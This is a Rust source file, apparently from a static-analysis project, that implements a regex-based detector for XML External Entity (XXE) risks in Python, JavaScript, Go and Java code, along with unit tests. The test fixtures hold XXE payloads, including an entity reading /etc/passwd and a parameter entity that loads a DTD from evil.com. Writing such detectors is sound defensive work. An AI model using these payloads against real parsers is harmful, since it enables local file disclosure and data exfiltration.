Complete Aphoria claims system overhaul: - A1: Rename ExtractedClaim to Observation (extractors produce observations, not claims) - A2: Add AuthoredClaim with full provenance, invariants, and authority tiers - A3: Verify engine comparing observations against authored claims, CLI + formatters - A4: Corpus as first-class assertions with predicate indexing, authority lens, trust packs - A5: Coverage analysis, explain/docs generation, self-audit extractor, claim suggester skill Also includes: 42 extractors updated for Observation type, verifiable_predicates trait, conflict detection with comparison modes, claims TOML persistence, Grafana dashboard, backup/restore scripts, and comprehensive test coverage. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
433 lines
14 KiB
Rust
433 lines
14 KiB
Rust
//! XML External Entity (XXE) vulnerability extractor.
|
|
//!
|
|
//! Detects patterns where XML parsers are used without disabling external entity
|
|
//! processing, which can lead to data exfiltration, SSRF, or denial of service.
|
|
|
|
use regex::Regex;
|
|
use stemedb_core::types::ObjectValue;
|
|
|
|
use super::traits::{build_claim, Extractor};
|
|
use crate::types::{Observation, Language};
|
|
|
|
/// Extractor for XXE vulnerabilities.
|
|
///
|
|
/// Detects patterns indicating potentially unsafe XML parsing:
|
|
/// - Python: lxml, xml.etree, xml.dom.minidom, xml.sax
|
|
/// - JavaScript: xml2js, libxmljs
|
|
/// - Go: encoding/xml
|
|
/// - Java-style patterns (polyglot detection)
|
|
/// - DTD entity declarations
|
|
pub struct XxeExtractor {
|
|
// Python patterns
|
|
python_lxml: Regex,
|
|
python_etree: Regex,
|
|
python_minidom: Regex,
|
|
python_sax: Regex,
|
|
|
|
// JavaScript patterns
|
|
js_xml2js: Regex,
|
|
js_libxmljs: Regex,
|
|
|
|
// Go patterns
|
|
go_xml: Regex,
|
|
|
|
// Java-style patterns
|
|
java_xxe: Regex,
|
|
|
|
// DTD entity declaration
|
|
entity_decl: Regex,
|
|
}
|
|
|
|
impl Default for XxeExtractor {
|
|
fn default() -> Self {
|
|
Self::new()
|
|
}
|
|
}
|
|
|
|
impl XxeExtractor {
|
|
/// Create a new XXE extractor with compiled regexes.
|
|
///
|
|
/// # Panics
|
|
/// Panics if any regex pattern is invalid (programmer error).
|
|
#[allow(clippy::expect_used)]
|
|
pub fn new() -> Self {
|
|
Self {
|
|
// Python: lxml/etree parse
|
|
python_lxml: Regex::new(r#"(?:etree|lxml)\.(?:parse|fromstring|XML)\s*\("#)
|
|
.expect("valid regex"),
|
|
|
|
// Python: xml.etree.ElementTree
|
|
python_etree: Regex::new(
|
|
r#"(?:xml\.etree\.ElementTree|ET)\.(?:parse|fromstring|XMLParser)\s*\("#,
|
|
)
|
|
.expect("valid regex"),
|
|
|
|
// Python: xml.dom.minidom
|
|
python_minidom: Regex::new(r#"xml\.dom\.minidom\.(?:parse|parseString)\s*\("#)
|
|
.expect("valid regex"),
|
|
|
|
// Python: xml.sax
|
|
python_sax: Regex::new(r#"xml\.sax\.(?:parse|parseString|make_parser)\s*\("#)
|
|
.expect("valid regex"),
|
|
|
|
// JavaScript: xml2js
|
|
js_xml2js: Regex::new(r#"xml2js\.(?:parseString|Parser)\s*\("#).expect("valid regex"),
|
|
|
|
// JavaScript: libxmljs
|
|
js_libxmljs: Regex::new(r#"libxmljs\.parseXml\s*\("#).expect("valid regex"),
|
|
|
|
// Go: encoding/xml
|
|
go_xml: Regex::new(r#"xml\.(?:Unmarshal|NewDecoder)\s*\("#).expect("valid regex"),
|
|
|
|
// Java-style patterns (polyglot detection in config files, etc.)
|
|
java_xxe: Regex::new(
|
|
r#"(?:DocumentBuilder|SAXParser|XMLReader|TransformerFactory)(?:Factory)?\.new"#,
|
|
)
|
|
.expect("valid regex"),
|
|
|
|
// DTD entity declaration (dangerous in untrusted XML)
|
|
entity_decl: Regex::new(r#"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)"#)
|
|
.expect("valid regex"),
|
|
}
|
|
}
|
|
|
|
fn make_claim(
|
|
path_segments: &[String],
|
|
file: &str,
|
|
line: usize,
|
|
matched: &str,
|
|
parser: &str,
|
|
confidence: f32,
|
|
description: &str,
|
|
) -> Observation {
|
|
build_claim(
|
|
path_segments,
|
|
&["xml", "parsing"],
|
|
"parser_config",
|
|
ObjectValue::Text(parser.to_string()),
|
|
file,
|
|
line,
|
|
matched,
|
|
confidence,
|
|
description,
|
|
)
|
|
}
|
|
}
|
|
|
|
impl Extractor for XxeExtractor {
|
|
fn name(&self) -> &str {
|
|
"xxe"
|
|
}
|
|
|
|
fn languages(&self) -> &[Language] {
|
|
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
|
|
}
|
|
|
|
fn extract(
|
|
&self,
|
|
path_segments: &[String],
|
|
content: &str,
|
|
language: Language,
|
|
file: &str,
|
|
) -> Vec<Observation> {
|
|
let mut claims = Vec::new();
|
|
|
|
for (line_idx, line) in content.lines().enumerate() {
|
|
let line_num = line_idx + 1;
|
|
|
|
// Check for DTD entity declarations (high risk in any context)
|
|
if let Some(m) = self.entity_decl.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"dtd_entity",
|
|
0.95,
|
|
"DTD SYSTEM/PUBLIC entity declaration (XXE attack vector)",
|
|
));
|
|
}
|
|
|
|
match language {
|
|
Language::Python => {
|
|
// lxml/etree (can be safe with proper configuration)
|
|
if let Some(m) = self.python_lxml.find(line) {
|
|
// Lower confidence if defusedxml is imported or resolve_entities=False
|
|
let confidence = if content.contains("defusedxml")
|
|
|| line.contains("resolve_entities=False")
|
|
{
|
|
0.5
|
|
} else {
|
|
0.85
|
|
};
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"lxml",
|
|
confidence,
|
|
"lxml XML parsing may be vulnerable to XXE without proper config",
|
|
));
|
|
}
|
|
|
|
// xml.etree.ElementTree
|
|
if let Some(m) = self.python_etree.find(line) {
|
|
// Python 3.8+ has some protections, but external entities still a concern
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"elementtree",
|
|
0.75,
|
|
"xml.etree.ElementTree may allow external entity expansion",
|
|
));
|
|
}
|
|
|
|
// xml.dom.minidom (vulnerable by default)
|
|
if let Some(m) = self.python_minidom.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"minidom",
|
|
0.85,
|
|
"xml.dom.minidom is vulnerable to XXE attacks",
|
|
));
|
|
}
|
|
|
|
// xml.sax (needs feature flags to be safe)
|
|
if let Some(m) = self.python_sax.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"sax",
|
|
0.85,
|
|
"xml.sax is vulnerable to XXE without feature_external_ges=False",
|
|
));
|
|
}
|
|
}
|
|
Language::JavaScript | Language::TypeScript => {
|
|
// xml2js (generally safer, but can be misconfigured)
|
|
if let Some(m) = self.js_xml2js.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"xml2js",
|
|
0.7,
|
|
"xml2js XML parsing - verify external entity settings",
|
|
));
|
|
}
|
|
|
|
// libxmljs (can be vulnerable)
|
|
if let Some(m) = self.js_libxmljs.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"libxmljs",
|
|
0.85,
|
|
"libxmljs may be vulnerable to XXE attacks",
|
|
));
|
|
}
|
|
}
|
|
Language::Go => {
|
|
// encoding/xml (safer by default, but DTD expansion can be issue)
|
|
if let Some(m) = self.go_xml.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"encoding_xml",
|
|
0.65,
|
|
"Go xml package - generally safe but verify with untrusted input",
|
|
));
|
|
}
|
|
}
|
|
_ => {}
|
|
}
|
|
|
|
// Check for Java patterns (polyglot detection)
|
|
if let Some(m) = self.java_xxe.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"java_parser",
|
|
0.9,
|
|
"Java XML parser - requires feature flags to prevent XXE",
|
|
));
|
|
}
|
|
}
|
|
|
|
claims
|
|
}
|
|
}
|
|
|
|
#[cfg(test)]
|
|
mod tests {
|
|
use super::*;
|
|
|
|
#[test]
|
|
fn test_python_lxml() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
doc = etree.parse(xml_file)
|
|
"#;
|
|
|
|
let claims =
|
|
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
assert!(claims[0].concept_path.contains("xml/parsing"));
|
|
}
|
|
|
|
#[test]
|
|
fn test_python_lxml_with_defusedxml() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
import defusedxml.ElementTree as ET
|
|
doc = etree.parse(xml_file)
|
|
"#;
|
|
|
|
let claims =
|
|
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
|
|
|
|
// Should still detect but with lower confidence
|
|
assert_eq!(claims.len(), 1);
|
|
assert!(claims[0].confidence < 0.6);
|
|
}
|
|
|
|
#[test]
|
|
fn test_python_elementtree() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
import xml.etree.ElementTree as ET
|
|
tree = ET.parse(source)
|
|
"#;
|
|
|
|
let claims =
|
|
extractor.extract(&["python".to_string()], content, Language::Python, "xml.py");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
}
|
|
|
|
#[test]
|
|
fn test_python_minidom() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
from xml.dom.minidom import parse
|
|
doc = xml.dom.minidom.parse(xml_string)
|
|
"#;
|
|
|
|
let claims =
|
|
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
assert!(claims[0].description.contains("minidom"));
|
|
}
|
|
|
|
#[test]
|
|
fn test_python_sax() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
xml.sax.parse(source, handler)
|
|
"#;
|
|
|
|
let claims =
|
|
extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
}
|
|
|
|
#[test]
|
|
fn test_js_xml2js() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
xml2js.parseString(xmlData, callback);
|
|
"#;
|
|
|
|
let claims =
|
|
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
}
|
|
|
|
#[test]
|
|
fn test_js_libxmljs() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
const doc = libxmljs.parseXml(xmlString);
|
|
"#;
|
|
|
|
let claims =
|
|
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
}
|
|
|
|
#[test]
|
|
fn test_go_xml() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
err := xml.Unmarshal(data, &result)
|
|
"#;
|
|
|
|
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "parser.go");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
}
|
|
|
|
#[test]
|
|
fn test_java_parser() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
|
|
"#;
|
|
|
|
let claims =
|
|
extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
assert!(claims[0].description.contains("Java"));
|
|
}
|
|
|
|
#[test]
|
|
fn test_dtd_entity() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
|
"#;
|
|
|
|
// Use a non-test filename to avoid confidence reduction
|
|
let claims =
|
|
extractor.extract(&["python".to_string()], content, Language::Python, "parser.xml");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
assert!(claims[0].confidence >= 0.9);
|
|
assert!(claims[0].description.contains("XXE attack vector"));
|
|
}
|
|
|
|
#[test]
|
|
fn test_dtd_public_entity() {
|
|
let extractor = XxeExtractor::new();
|
|
let content = r#"
|
|
<!ENTITY % remote PUBLIC "http://evil.com/evil.dtd">
|
|
"#;
|
|
|
|
let claims =
|
|
extractor.extract(&["python".to_string()], content, Language::Python, "test.xml");
|
|
|
|
assert_eq!(claims.len(), 1);
|
|
}
|
|
}
|